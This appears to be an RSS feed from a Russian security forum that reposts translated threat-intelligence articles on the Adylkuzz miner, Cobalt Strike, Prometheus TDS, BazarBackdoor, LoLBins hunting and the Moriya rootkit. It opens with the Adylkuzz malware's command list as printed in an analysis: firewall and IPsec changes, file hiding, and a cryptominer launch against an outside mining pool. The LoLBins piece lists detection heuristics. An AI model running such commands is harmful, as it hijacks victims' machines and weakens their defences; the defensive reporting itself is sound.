netsh ipsec static add filteraction name=block action=block<br />
netsh ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445 protocol=tcp description=445<br />
netsh ipsec static add rule name=block policy=netbc filterlist=block filteraction=block<br />
netsh ipsec static set policy name=netbc assign=y<br />
C:\Windows\Fonts\wuauser.exe --server<br />
C:\Windows\Fonts\msiexev.exe -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 49v1V2suGMS8JyPEU5FTtJRTHQ9YmraW7Mf2btVCTxZuEB8EjjqQz3i8vECu7XCgvUfiW6NtSRewnHF5MNA3LbQTBQV3v9i -p x -t 1<br />
C:\Windows\TEMP\\s2bk.1_.exe /stab C:\Windows\TEMP\\s2bk.2_.log<br />
taskkill /f /im msiexev.exe<br />
netsh advfirewall firewall delete rule name="Chrome"<br />
netsh advfirewall firewall delete rule name="Windriver"<br />
netsh advfirewall firewall add rule name="Chrome" dir=in program="C:\Program Files\Google\Chrome\Application\chrome.txt" action=allow<br />
netsh advfirewall firewall add rule name="Windriver" dir=in program="C:\Program Files\Hardware Driver Management\windriver.exe" action=allow<br />
C:\Windows\445.bat<br />
C:\Windows\system32\PING.EXE ping 127.0.0.1<br />
net stop Windows32_Update<br />
attrib +s +a +r +h wuauser.exe<br />
C:\Windows\system32\SecEdit.exe secedit /configure /db C:\Windows\netbios.sdb<br />
C:\Windows\system32\net1 stop Windows32_Update</div>
</blockquote>
<br />
Похоже, что в любой момент времени существует несколько серверов управления и контроля (C&amp;C) Adylkuzz, на которых размещаются двоичные файлы криптомайнера и инструкции по майнингу.<br /><br /><br /><b>Заключение</b><br /><br />
Как и кампания WannaCry на прошлой неделе, в этой атаке используются просочившиеся хакерские инструменты АНБ и исправленная уязвимость в сети Microsoft Windows. Кампания Adylkuzz фактически предшествует WannaCry на много дней. Для организаций, использующих устаревшие версии Windows или не внедривших исправление SMB, выпущенное Microsoft в прошлом месяце, компьютеры и серверы останутся уязвимыми для этого типа атак. Независимо от того, связаны ли они с программами-вымогателями, майнерами криптовалюты или любым другим типом вредоносного ПО, эти атаки потенциально могут быть весьма разрушительными и дорогостоящими. Две основные кампании уже использовали инструменты атаки и уязвимости; мы ожидаем, что другие последуют за ними, и рекомендуем организациям и частным лицам исправлять свои машины как можно скорее.<br /><br />
e6680bf0d3b32583047e9304d1703c87878c7c82910fbe05efc8519d2ca2df71 	2017-05-14 	Msiexev.exe<br />
Bitcoin miner process<br /><br /><a href="https://www.proofpoint.com/us/blog\threat-insight/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar" rel="nofollow">https://www.proofpoint.com/us/blog\threat-insight/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar</a><br /><br /><a href="https://xakep.ru/2017/05/17/more-attacks-on-smb/" rel="nofollow">https://xakep.ru/2017/05/17/more-attacks-on-smb/</a><br /><br />
пример AdylKuzz в образе автозапуска:
<blockquote>

<div>Полное имя                  C:\WINDOWS\PREFETCH\WUAUSER.EXE<br />
Обнаруженные сигнатуры<br />
Сигнатура                   Trojan:Win32/Adylkuzz.A [Microsoft] (delall) [глубина совпадения 64(64), необх. минимум 8, максимум 64] 2018-10-23<br />
Размер                      207360 байт<br />
Создан                      26.04.2017 в 17:29:34<br />
Изменен                     26.04.2017 в 17:29:3<br />
Доп. информация             на момент обновления списка<br />
SHA1                        D84884B6B2018C2859638EE7ACB40ECDC642B324<br />
MD5                         B36BA9B358A2B85206CA5AB644021945<br />
Ссылки на объект<br />
Ссылка                      HKLM\System\CurrentControlSet\Services\WELM\ImagePath<br />
ImagePath                   C:\Windows\Prefetch\wuauser.exe --server<br />
WELM                        тип запуска: Авто (2)</div>
</blockquote>

<blockquote>

<div>Полное имя                  C:\WINDOWS\SECURITY\MSIEXEV.EXE<br />
Обнаруженные сигнатуры<br />
Сигнатура                   Trojan:Win32/Adylkuzz.A [Microsoft] (delall) [глубина совпадения 64(64), необх. минимум 8, максимум 64] 2018-10-23<br />
Размер                      1233408 байт<br />
Создан                      27.04.2017 в 13:16:22<br />
Изменен                     27.04.2017 в 13:16:22<br />
Доп. информация             на момент обновления списка<br />
SHA1                        5B6BE3DE3143AAAFBE6A3B2FCDA778DF5A8989C3<br />
MD5                         B60F2EFACB26A2462B3D6E826F281AC4</div>
</blockquote>
<br />
===================<br />]]>
        </description>
    </item>
    <item>
        <title>Cobalt Strike: любимый инструмент от APT до Crimeware</title>
        <link>https://chklst.ru/discussion/1888/cobalt-strike-lyubimyy-instrument-ot-apt-do-crimeware</link>
        <pubDate>Thu, 01 Jul 2021 06:16:11 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1888@/discussions</guid>
        <description><![CDATA[Ключевые результаты<br /><br />
Злонамеренное использование Cobalt Strike в кампаниях злоумышленников увеличивается.<br />
Использование Cobalt Strike субъектами угрозы увеличилось на 161% с 2019 по 2020 год и останется крупномасштабной угрозой в 2021 году.<br />
Cobalt Strike в настоящее время используется больше операторами киберпреступности и массового вредоносного ПО, чем злоумышленниками APT и шпионажем.<br /><br />
Обзор<br /><br />
В 2021 году Cobalt Strike будет появляться в данных об угрозах Proofpoint чаще, чем когда-либо. Cobalt Strike - это законный инструмент безопасности, используемый тестировщиками на проникновение для имитации активности злоумышленников в сети. Тем не менее, он также все чаще используется злоумышленниками - согласно Proofpoint использование этого инструмента злоумышленниками  с 2019 по 2020 год увеличилось на 161%. Это согласуется с наблюдениями других фирм по безопасности, поскольку все больше злоумышленников применяют хакерские инструменты в своей деятельности.<br /><br />
При сопоставлении со структурой MITRE ATT &amp; CK видимость цепочки атак Proofpoint фокусируется на <b>механизмах начального доступа, выполнения и устойчивости</b>. То есть: как злоумышленники пытаются скомпрометировать хосты и какие полезные нагрузки развертывают в первую очередь? Основываясь на наших данных, Proofpoint с высокой степенью уверенности оценивает, что Cobalt Strike становится все более популярным среди злоумышленников в качестве полезной нагрузки начального доступа, а не просто второстепенного инструмента, который злоумышленники используют после получения доступа, при этом преступники составляют основную часть использования Cobalt Strike в 2020 году.<br /><br />
Задний план<br /><br />
В декабре 2020 года мир узнал о масштабной и эффективной шпионской кампании, которая успешно использовала популярное программное обеспечение для мониторинга сети SolarWinds. Следователи выявили инструменты, используемые злоумышленниками, в том числе Cobalt Strike Beacon. Эта кампания была приписана  группе, имеющей Cobalt Strike в своем арсенале как минимум с 2018 года. Эта масштабная деятельность была частью продуманной цепочки атак, позволяющей продвинутым злоумышленникам тайно скомпрометировать относительно небольшое число жертв. Используемому инструменту, настроенному в соответствии с их потребностями, почти десять лет, но он становится все более популярным.<br /><br />
Cobalt Strike дебютировал в 2012 году в ответ на очевидные пробелы в существующем инструменте REd Team - Metasploit Framework. В 2015 году Cobalt Strike 3.0 была запущена как автономная платформа для эмуляции противников. К 2016 году исследователи Proofpoint начали наблюдать за злоумышленниками, использующими Cobalt Strike.<br /><br />
Исторически, использование Cobalt Strike в злонамеренных операциях в значительной степени было связано с хорошо обеспеченными ресурсами субъектами угроз, в том числе крупными операторами киберпреступности, такими как TA3546 (также известными как FIN7), и группами сложных постоянных угроз (APT), такими как TA423 (также известные как Leviathan или APT40). Исследователи Proofpoint отнесли две трети идентифицированных кампаний Cobalt Strike с 2016 по 2018 год к хорошо обеспеченным ресурсами организациям, занимающимся киберпреступностью, или группам APT. В последующие годы это соотношение резко снизилось - с 2019 года по настоящее время только 15 процентов кампаний Cobalt Strike были связаны с известными злоумышленниками.<br /><br />
Злоумышленники могут получить Cobalt Strike разными способами: приобрести его непосредственно на веб-сайте поставщика, что требует проверки; покупка версии в даркнете через различные хакерские форумы; или с использованием взломанных незаконных версий программного обеспечения. В марте 2020 года была выпущена взломанная версия Cobalt Strike 4.0, доступная злоумышленникам.<br /><br />
Призыв Cobalt Strike<br /><br />
Cobalt Strike используется множеством различных злоумышленников, и хотя киберпреступники и участники APT-атак нередко используют аналогичные инструменты в своих кампаниях, Cobalt Strike уникален тем, что его встроенные возможности позволяют быстро развернуть и ввести в действие. независимо от уровня подготовки участников или доступа к человеческим или финансовым ресурсам. Работа по моделированию атак субъектов и проникновения через оборону может стать немного более простой, если обе стороны используют один и тот же инструмент.<br /><br />
Cobalt Strike также основан на сеансах - то есть, если злоумышленники могут получить доступ к узлу и завершить операцию без необходимости постоянного сохранения, на узле не останется артефактов после того, как он перестанет работать в памяти. По сути: они могут ударить и забыть.<br /><br />
Злоумышленники также могут использовать гибкость Cobalt Strike для создания настраиваемых сборок, которые добавляют или удаляют функции для достижения целей или уклонения от обнаружения. Например, APT29 часто использует пользовательские загрузчики Cobalt Strike Beacon, чтобы слиться с легальным трафиком или избежать анализа.<br /><br />
Для защитников настраиваемые модули Cobalt Strike часто требуют уникальных сигнатур, поэтому от инженеров по обнаружению угроз могут потребоваться попытки догнать использование Cobalt Strike в дикой природе. Cobalt Strike также привлекает злоумышленников из-за присущей ему обфускации. Если в организации Red Team, активно использующая его, есть вероятность, что вредоносный трафик будет ошибочно принят за законный. Простота использования программного обеспечения может улучшить возможности менее искушенных участников. Для опытных участников, зачем тратить циклы разработки на что-то новое, если у вас уже есть отличный инструмент для работы?<br /><br />
Данные Proofpoint показывают, что <b>Cobalt Strike - популярный инструмент для всего, от стратегических компромиссов до шумных и масштабных кампаний.</b> Следующие ниже примеры иллюстрируют небольшую выборку типов злоумышленников, использующих Cobalt Strike, отслеживаемых Proofpoint.<br /><br />
Агенты угрозы<br /><br /><b>TA800</b><br /><br />
TA800 - крупная преступная группа, отслеживаемая Proofpoint с середины 2019 года. Этот субъект пытается доставить и установить банковское вредоносное ПО или загрузчики вредоносных программ, включая The Trick и BazaLoader. В апреле 2020 года TA800 стала первой наблюдаемой группой, распространяющей BazaLoader. В этих ранних кампаниях злоумышленник распространял электронные письма со злонамеренной ссылкой на исполняемый файл или на целевую страницу, размещенную в Документах Google, со ссылкой на исполняемый файл. Исполняемый файл загрузил бэкдор BazaLoader, который, в свою очередь, загрузил Cobalt Strike. В феврале 2021 года группа перешла к распространению Cobalt Strike в качестве полезной нагрузки первого уровня через вредоносные URL-адреса. Были некоторые свидетельства того, что NimzaLoader из TA800 использовался для загрузки и выполнения Cobalt Strike в качестве вторичной полезной нагрузки.<br /><br /><b>TA547</b><br /><br />
TA547 - это злоумышленник, отслеживаемый Proofpoint с октября 2017 года. Эта группа, похоже, заинтересована в распространении в основном банковских троянов, включая The Trick и ZLoader, в различных географических регионах. С середины 2020 года этот субъект выступает за использование вредоносных вложений Microsoft Office для распространения вредоносных программ. В феврале 2021 года TA547 начал распространение Cobalt Strike в качестве полезной нагрузки второго уровня для управления и контроля.<br />
+<br />]]>
        </description>
    </item>
    <item>
        <title>Prometheus TDS: сервис стоимостью 250 долларов, стоящий за недавними атаками вредоносного ПО</title>
        <link>https://chklst.ru/discussion/1900/prometheus-tds-servis-stoimostyu-250-dollarov-stoyaschiy-za-nedavnimi-atakami-vredonosnogo-po</link>
        <pubDate>Fri, 06 Aug 2021 11:54:03 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1900@/discussions</guid>
        <description><![CDATA[Исследователи безопасности, расследующие несколько кампаний по распространению вредоносных программ, обнаружили, что подпольная служба распределения трафика под названием <b>Prometheus </b>отвечает за доставку угроз, которые часто приводят к атакам программ-вымогателей.<br /><blockquote>

<div>Среди семейств вредоносных программ, которые компания Prometheus TDS представила на данный момент, - <b>BazarLoader, IcedID, QBot, SocGholish, Hancitor и Buer Loader</b>, и все они обычно используются на промежуточных этапах атаки для загрузки более опасной полезной нагрузки.</div>
</blockquote>
<br />
Служба доставки троянцев<br /><br />
Система направления трафика (TDS) позволяет перенаправлять пользователей к контенту на основе конкретных характеристик (например, местоположения, языка, типа устройства), которые определяют дальнейшие действия.<br /><br />
Злоумышленники используют такие инструменты более десяти лет. В отчете Trend Micro за 2011 год подробно рассказывается об обновлении ботнета Koobface компонентом TDS, который увеличил прибыль за счет привлечения трафика на сайты партнерской рекламы.<br /><br />
Исследователи из компании Group-IB, занимающейся кибербезопасностью, обнаружили, что операция Prometheus TDS Malware-as-a-Service (MaaS) рекламируется на подпольных форумах как минимум с августа 2020 года за 250 долларов в месяц.<br /><br />
Prometheus использует сеть веб-сайтов, зараженных бэкдором, доступным из панели администрирования сервиса, где клиенты могут создавать профили для своих целей.<br /><br />
Исследователи говорят, что пользователи могут быть перенаправлены на веб-сайт, зараженный Prometheus.Backdoor через кампанию электронной почты, доставляющую HTML-файл с перенаправлением, или ссылку на веб-оболочку, ведущую на взломанный сайт, или документ Google, указывающий на вредоносный URL-адрес. .<br /><br /><img src="https://www.bleepstatic.com/images/news/u/1100723/Botnets/PrometheusTDSDistribution.jpg" alt="PrometheusTDSDistribution.jpg" /><br /><br />
Когда пользователи попадают на взломанный веб-сайт, Prometheus.Backdoor на основе PHP собирает сведения о подключении (IP-адрес, пользовательский агент, заголовок реферера, часовой пояс, язык) и перенаправляет их в панель администратора.<br /><br />
«Если пользователь не распознается как бот, то, в зависимости от конфигурации, административная панель может отправить команду для перенаправления пользователя на указанный URL или для отправки вредоносного файла. Файл полезной нагрузки отправляется с использованием специального кода JavaScript »- Group-IB<br /><br />
Вредоносный код часто скрывается во вредоносных документах Microsoft Word или Excel, хотя также использовались архивы ZIP и RAR.<br /><br />
В ходе расследования команда Group-IB Threat Intelligence обнаружила более 3000 целевых адресов электронной почты в кампаниях, в которых использовался Prometheus TDS.<br /><br />
Все вышеперечисленные трояны являются загрузчиками вредоносных программ, задействованных в прошлом году на более ранних этапах атаки программ-вымогателей (WastedLocker, Ryuk, Egregor, RansomExx, REvil, Cuba, Conti).<br /><br />
Однако команда Group-IB Threat Intelligence сообщила BleepingComputer, что они не могут связать Prometheus TDS с атаками программ-вымогателей, поскольку они исследовали вредоносные файлы в виртуальной среде.<br /><br />
«Исследователи Group-IB изучили извлеченные вредоносные файлы в виртуальной среде, в то время как операторы программ-вымогателей сейчас, как правило, действуют избирательно, а это означает, что после компрометации сети они переходят к горизонтальному перемещению, чтобы узнать больше о скомпрометированной компании и решить, стоит ли это чтобы зашифровать свою сеть. Так что, возможно, виртуальные машины не казались злоумышленникам достаточно привлекательными »- Group-IB<br /><br />
После загрузки вредоносного ПО некоторые вредоносные документы перенаправляли пользователей на легитимные веб-сайты (DocuSign, USPS), чтобы замаскировать заражение вредоносным ПО.<br /><br /><a href="https://www.bleepingcomputer.com/news/security/prometheus-tds-the-250-service-behind-recent-malware-attacks/" rel="nofollow">https://www.bleepingcomputer.com/news/security/prometheus-tds-the-250-service-behind-recent-malware-attacks/</a>]]>
        </description>
    </item>
    <item>
        <title>BazarBackdoor проникает через вложенные архивы RAR и ZIP</title>
        <link>https://chklst.ru/discussion/1892/bazarbackdoor-pronikaet-cherez-vlozhennye-arhivy-rar-i-zip</link>
        <pubDate>Fri, 16 Jul 2021 02:46:39 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1892@/discussions</guid>
        <description><![CDATA[Исследователи безопасности обнаружили новую фишинговую кампанию, в которой пытались доставить вредоносное ПО BazarBackdoor, используя технику множественного сжатия и маскируя его под файл изображения.<br /><br />
Метод многократного сжатия или вложенного архива не нов, но приобрел популярность в последнее время, поскольку он может обмануть шлюзы безопасности электронной почты, чтобы они ошибочно пометили вредоносные вложения как чистые.<br /><br />
Он заключается в помещении одного архива в другой. Исследователи из Cofense говорят, что этот метод может обойти некоторые безопасные почтовые шлюзы (SEG), которые могут иметь ограничение на глубину проверки сжатого файла.<br /><br />
Новая кампания BazarBackdoor, развернутая ранее в этом месяце, привлекла корпоративных клиентов темой «Дня окружающей среды», который официально отмечается 5 июня.<br /><br />
Оба вложенных архива ZIP и RAR во вложении содержали файл JavaScript, который в конечном итоге доставлял вредоносное ПО Trickbot BazarBackdoor, скрытый бэкдор, обычно используемый на корпоративных объектах для обеспечения удаленного доступа к злоумышленнику.<br /><br />
Cofense проанализировал недавнюю кампанию по борьбе со спамом и обнаружил, что роль файла JavaScript заключалась в загрузке полезной нагрузки с расширением изображения.<br /><br />
Кофенс объясняет, что «вложение различных типов архивов является целенаправленным для злоумышленника, поскольку у него есть шанс достичь предела декомпрессии SEG или не удастся из-за неизвестного типа архива».<br /><br />
Обфусцированные файлы также могут создавать проблемы для SEG, если для полезной нагрузки используется несколько уровней шифрования, что увеличивает вероятность того, что вредоносный файл пройдет незамеченным.<br /><br />
«После выполнения обфусцированный JavaScript загрузит полезную нагрузку [BazarBackdoor] с расширением .png через соединение HTTP GET», - говорит Кофенс, добавляя, что полезная нагрузка является исполняемым файлом с неправильным расширением.<br /><br />
После развертывания на компьютере жертвы BazarBackdoor может загрузить и выполнить Cobalt Strike, законный набор инструментов, предназначенный для постэксплуатационных упражнений, для распространения в окружающей среде.<br /><br />
Получив доступ к ценным системам в сети, злоумышленники могут запускать атаки программ-вымогателей, красть конфиденциальную информацию или продавать доступ другим киберпреступникам.<br /><br />
Ранее в этом году исследователи безопасности обнаружили вариант BazarBackdoor, написанный на языке программирования Nim, что свидетельствует о том, какие усилия прилагает разработчик Trickbot для того, чтобы вредоносное ПО оставалось незамеченным и соответствовало действиям киберпреступников.<br /><br /><a href="https://www.bleepingcomputer.com/news/security/bazarbackdoor-sneaks-in-through-nested-rar-and-zip-archives/" rel="nofollow">https://www.bleepingcomputer.com/news/security/bazarbackdoor-sneaks-in-through-nested-rar-and-zip-archives/</a>]]>
        </description>
    </item>
    <item>
        <title>Hunting for LoLBins</title>
        <link>https://chklst.ru/discussion/1890/hunting-for-lolbins</link>
        <pubDate>Sat, 03 Jul 2021 07:31:18 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1890@/discussions</guid>
        <description><![CDATA[<b>Вступление</b><br /><br />
Тенденции злоумышленников, как правило, приходят и уходят. Но одна популярная техника, которую мы наблюдаем в настоящее время, - это использование живых двоичных файлов, или «LoLBins». LoLBins используются различными субъектами в сочетании с бесфайловыми вредоносными программами и законными облачными сервисами, чтобы повысить шансы остаться незамеченными в организации, как правило, на этапах атаки после эксплуатации.<br /><br />
Тактика «за пределами земли» означает, что злоумышленники используют предустановленные инструменты для выполнения своей работы. Это затрудняет для защитников обнаружение атак, а исследователям - выявление злоумышленников, стоящих за кампанией. В атаках, которые мы наблюдаем, есть двоичные файлы, предоставляемые операционной системой жертвы, которые обычно используются в законных целях, но в этих случаях злоумышленники злоупотребляют ими.<br /><br />
В этом посте мы рассмотрим использование LOLBin через призму телеметрии продуктов Cisco. Мы также рассмотрим наиболее часто используемые системные двоичные файлы Windows и измерим их использование, проанализировав данные из Cisco AMP для конечных точек.<br /><br />
Вы также найдете обзор нескольких недавних кампаний, которые мы видели с использованием LoLBins, а также рекомендации по обнаружению вредоносных действий LoLBin.<br /><br /><b>Что такое LoLBins</b><br />
LoLBin - это любой двоичный файл, предоставляемый операционной системой, который обычно используется в законных целях, но также может быть использован злоумышленниками. Некоторые системные двоичные файлы по умолчанию имеют неожиданные побочные эффекты, которые могут позволить злоумышленникам скрыть свои действия после эксплуатации.<br /><br />
Концепция LoLBins не нова и не специфична для Windows. Почти все обычные операционные системы, начиная с ранних версий DOS и Unix, содержали исполняемые файлы, которые могли использовать злоумышленники.<br /><br /><br />
В целом злоумышленники могут использовать LoLBins для:<br /><br />
Скачать и установить вредоносный код<br />
Выполнить вредоносного кода<br />
Обход UAC<br />
Обход управления приложениями, например (WDAC)<br /><br />
Злоумышленники могут атаковать другие утилиты, которые часто предварительно устанавливаются производителями систем и могут быть обнаружены во время разведки. Эти исполняемые файлы могут быть подписаны: такие как программы обновления, программы настройки и различные сторонние драйверы.<br /><br />
Использование LoLBins часто сочетается с законными облачными сервисами, такими как GitHub, Pastebin, хранилище Amazon S3 и облачными дисками, такими как Dropbox, Box и Google Drive. При использовании легитимных облачных сервисов для хранения вредоносного кода инфраструктура управления и контроля (C2) и действия злоумышленников с большей вероятностью останутся незамеченными, поскольку генерируемый трафик не отличается от трафика, генерируемого системами, которые не были скомпрометированы.<br /><br />
Talos в основном заинтересован в поиске исполняемых файлов, которые можно использовать для загрузки или выполнения вредоносного кода. В нашем исследовании мы отслеживаем ежедневные шаблоны выполнения следующих исполняемых файлов, чтобы обнаружить злоупотребления ими:<br /><blockquote>

<div>powershell.exe<br />
bitsadmin.exe<br />
certutil.exe<br />
psexec.exe<br />
wmic.exe<br />
mshta.exe<br />
mofcomp.exe<br />
cmstp.exe<br />
windbg.exe<br />
cdb.exe<br />
msbuild.exe<br />
csc.exe<br />
regsvr32.exe</div>
</blockquote>
<b><br />
Злоупотребление PowerShell</b><br /><br />
Основным подозреваемым в загрузке вредоносного кода и выполнении в памяти в последнее время является PowerShell. Злоумышленники обычно используют эту командную оболочку, которая построена на платформе управления Windows и .NET. Эта мощная административная среда имеет политику безопасности, которая может предотвратить выполнение ненадежного кода. К сожалению, эту политику можно легко обойти с помощью одного параметра командной строки.<br /><br />
Код PowerShell не чувствителен к регистру и принимает сокращенные версии параметров командной строки, если этот параметр не является двусмысленным. Например, параметр -EncodedCommand, который принимает в качестве параметра строку в кодировке Base64, также может быть вызван как -EncodedC или даже -enc, что обычно используется злоумышленниками.<br /><br />
Популярные вредоносные программы, такие как Sodinokibi и Gandcrab, в прошлом использовали отражающие загрузчики DLL, которые позволяют злоумышленникам загружать динамическую библиотеку в память процесса без использования Windows API.<br /><br />
Модуль Invoke-Obfuscation часто используется для создания полиморфных обфусцированных вариантов, которые не будут обнаружены антивирусными программами и другими защитными механизмами.<br /><br />
Со временем злоумышленники также осознали вредоносный потенциал PowerShell, увеличив количество исполняемых файлов, используемых в качестве LoLBin. Msbuild.exe и компилятор C # csc.exe - одни из наиболее часто используемых red team. Оба они часто используются для загрузки, сборки и загрузки вредоносного кода, который создан для этой конкретной системы и не отображается ни в одном из списков блокировки исполняемых файлов.<br /><br />
Измерение использования LoLBins<br /><br />
Мы проанализировали телеметрию, предоставляемую Cisco AMP для конечных точек, чтобы измерить, как часто используются LoLBin. Телеметрия, отправляемая по защищенному каналу, содержит имена вызванных процессов и криптографические контрольные суммы их образов файлов, что помогает нам отслеживать траектории файлов и строить отношения родительско-дочерних процессов, которые можно использовать для поиска.<br /><br /><img src="https://1.bp.blogspot.com/-86637Jpn1js/XcqvwNo69mI/AAAAAAAAAUk/nh6g5Vm251Ugj3aKUKyOOn3U_cNbWq1sgCLcBGAsYHQ/s640/image4.jpg" alt="image4.jpg" /><br /><br />
Данные телеметрии ориентированы на обнаружение новых атак по мере их возникновения, но они также должны позволить нам измерить, сколько потенциальных вызовов LoLBin являются подозрительными.<br /><br />
Мы посмотрели на разные LoLBin, где решение можно было принять быстро. Во всех случаях мы предполагаем наихудший сценарий и обозначаем любой вызов следующих процессов с URL-адресом в качестве параметра как подозрительный:<br /><blockquote>

<div>mshta.exe<br />
certutil.exe<br />
bitsadmin.exe<br />
regsvr32.exe<br />
powershell.exe</div>
</blockquote>
<br /><br />
Наше упрощенное определение вызова подозрительного процесса означает, что он также будет иметь значительный процент ложных срабатываний. Например, для вызовов PowerShell с URL-адресом в командной строке, по нашим оценкам, только 7 процентов первоначально выбранных вызовов должны быть тщательно проверены и, скорее всего, будут вредоносными.<br /><br />
Мы получаем процент подозрительных звонков, ежедневно добывая миллиарды точек данных и деля количество обнаруженных подозрительных звонков на общее количество звонков. В целом, наш наихудший сценарий показывает, что по крайней мере 99,8% всех вызовов LoLBin не заслуживают дальнейшего изучения.<br /><br />
Затем мы проанализировали эти потенциально подозрительные вызовы, чтобы найти те, которые могут быть вредоносными.<br /><br />
Еще раз возьмем PowerShell. Худший показатель для потенциально подозрительного выполнения процессов PowerShell составил 0,2%. Однако, как упоминалось ранее, только 7 процентов из них действительно требуют углубленного изучения, что снижает процент до 0,014 процента. Следовательно, по крайней мере 99,986% вызовов PowerShell являются законными.<br /><br />
Простое практическое правило для URL-адресов, которые можно использовать для определения вызовов, которые с большей вероятностью могут быть вредоносными, - это искать вызов LoLBins в сочетании с:<br /><blockquote>

<div>Внешний числовой IP-адрес<br />
Любой домен верхнего уровня .net<br />
Любой домен верхнего уровня .eu<br />
Любой домен .ru<br />
Любой URL-адрес, заканчивающийся расширением исполняемого файла или изображения (например, .EXE, .LNK, .DLL, .JPG, .PNG и т. Д.)<br />
Любая ссылка на Pastebin.com и его клоны.<br />
Любая ссылка на Github или любые другие сайты репозитория исходного кода.</div>
</blockquote>
<br />
Уровни навыков актеров LoLBins<br /><br />
В этом разделе мы опишем три отдельные кампании, показывающие использование PowerShell в сочетании с кодом только для памяти от трех разных субъектов с разными наборами навыков.<br /><br />
Случай 1. Распространенные программы-вымогатели<br /><br />
Первый случай связан с программой-вымогателем Sodinokibi. Sodinokibi - довольно распространенная программа-вымогатель, которая распространяется с использованием стандартных методов, таких как фишинг и наборы эксплойтов, а также с использованием уязвимостей в веб-фреймворках, таких как WebLogic.<br /><br />
Из телеметрии видно, что PowerShell запускается с командлетом Invoke-Expression, оценивающим код, загруженный с веб-страницы Pastebin, с помощью функции Net.WebClient.DownloadString, которая загружает веб-страницу в виде строки и сохраняет ее в памяти.<br /><br />
+]]>
        </description>
    </item>
    <item>
        <title>Новый руткит Moriya использует бэкдор в системах Windows</title>
        <link>https://chklst.ru/discussion/1878/novyy-rutkit-moriya-ispolzuet-bekdor-v-sistemah-windows</link>
        <pubDate>Thu, 06 May 2021 14:54:13 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1878@/discussions</guid>
        <description><![CDATA[Неизвестный злоумышленник использовал новый скрытый руткит для бэкдора, нацеленного на системы Windows, что похоже на продолжающуюся шпионскую кампанию под названием TunnelSnake, начавшуюся как минимум с 2018 года.<br /><br /><b>Руткиты - это вредоносные инструменты, предназначенные для уклонения от обнаружения путем закапывания глубоко в операционную систему и используемые злоумышленниками для полного захвата зараженных систем, избегая обнаружения.</b><br /><br />
Ранее неизвестная вредоносная программа, получившая название Moriya от исследователей «Лаборатории Касперского», которые обнаружили ее в «дикой природе», представляет собой пассивный бэкдор, который позволяет злоумышленникам тайно шпионить за сетевым трафиком своих жертв и отправлять команды на взломанные узлы.<br /><br />
Необычно уклончивый бэкдор для шпионажа<br /><br />
Moriya позволила операторам TunnelSnake захватывать и анализировать входящий сетевой трафик «из адресного пространства ядра Windows, области памяти, в которой находится ядро операционной системы и где обычно выполняется только привилегированный и доверенный код».<br /><br />
Способ получения бэкдором команд в виде специально созданных пакетов, скрытых в сетевом трафике жертвы, без необходимости обращаться к командно-контрольному серверу, дополняет скрытность операции, демонстрируя сосредоточенность злоумышленника на уклонении от обнаружения. .<br /><br />
«Мы видим все больше и больше скрытых кампаний, таких как TunnelSnake, где участники предпринимают дополнительные шаги, чтобы оставаться вне поля зрения как можно дольше, и вкладывают средства в свои наборы инструментов, делая их более специализированными, сложными и трудными для обнаружения», - сказал Марк Лехтик. - сказал старший исследователь безопасности в группе глобальных исследований и анализа Kaspersky.<br /><br /><img src="https://www.bleepstatic.com/images/news/u/1109292/2021/Operation-TunnelSnake.png" alt="Operation-TunnelSnake.png" /><br /><br />
По данным телеметрии «Лаборатории Касперского», вредоносная программа была развернута в сетях менее 10 объектов в ходе высокоточной атаки.<br /><br />
Злоумышленник использовал бэкдор-системы, принадлежащие азиатским и африканским дипломатическим учреждениям и другим высокопоставленным организациям, чтобы получить контроль над их сетями и сохранять постоянство в течение месяцев, не будучи обнаруженным.<br /><br />
Злоумышленники также развернули дополнительные инструменты (в том числе China Chopper, BOUNCER, Termite и Earthworm) на этапе постэксплуатации скомпрометированных систем (изготовленные на заказ и ранее использовавшиеся китайскоязычными участниками).<br /><br />
Это позволило им перемещаться по сети после сканирования и обнаружения новых уязвимых хостов в сетях жертв.<br /><br />
Все свидетельства указывают на китайскоязычных исполнителей угроз.<br /><br />
Хотя исследователи «Лаборатории Касперского» не смогли связать кампанию с конкретным злоумышленником, тактика, методы и процедуры (ДТС), использованные в атаках, и целевые объекты предполагают, что злоумышленники, скорее всего, говорят по-китайски.<br /><br />
«Мы также обнаружили более старую версию Moriya, использовавшуюся в автономной атаке в 2018 году, что указывает на то, что злоумышленник был активен как минимум с 2018 года», - добавил Джампаоло Дедола, старший исследователь безопасности в группе глобальных исследований и анализа Kaspersky.<br /><br />
«Профиль целей и задействованный набор инструментов позволяют предположить, что целью этой кампании является шпионаж, хотя мы можем лишь частично подтвердить это из-за отсутствия видимости каких-либо фактических перекачиваемых данных».<br /><br />
Более подробную техническую информацию о рутките Moriya и индикаторах компрометации, связанных с кампанией TunnelSnake, можно найти <a href="https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/" rel="nofollow">в отчете Касперского.</a><br /><br />
В октябре Касперский также обнаружил второй в мире руткит UEFI, используемый в дикой природе (известный как MosaicRegressor), при расследовании атак 2019 года на две неправительственные организации (НПО).<br /><br />
Предыдущий буткит UEFI, используемый в дикой природе, известен как LoJax и был обнаружен ESET в 2018 году.<br /><br /><a href="https://www.bleepingcomputer.com/news/security/new-moriya-rootkit-used-in-the-wild-to-backdoor-windows-systems/" rel="nofollow">https://www.bleepingcomputer.com/news/security/new-moriya-rootkit-used-in-the-wild-to-backdoor-windows-systems/</a><br /><br />]]>
        </description>
    </item>
    <item>
        <title>Что такое Emotet?</title>
        <link>https://chklst.ru/discussion/1864/chto-takoe-emotet</link>
        <pubDate>Wed, 06 Jan 2021 13:28:03 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
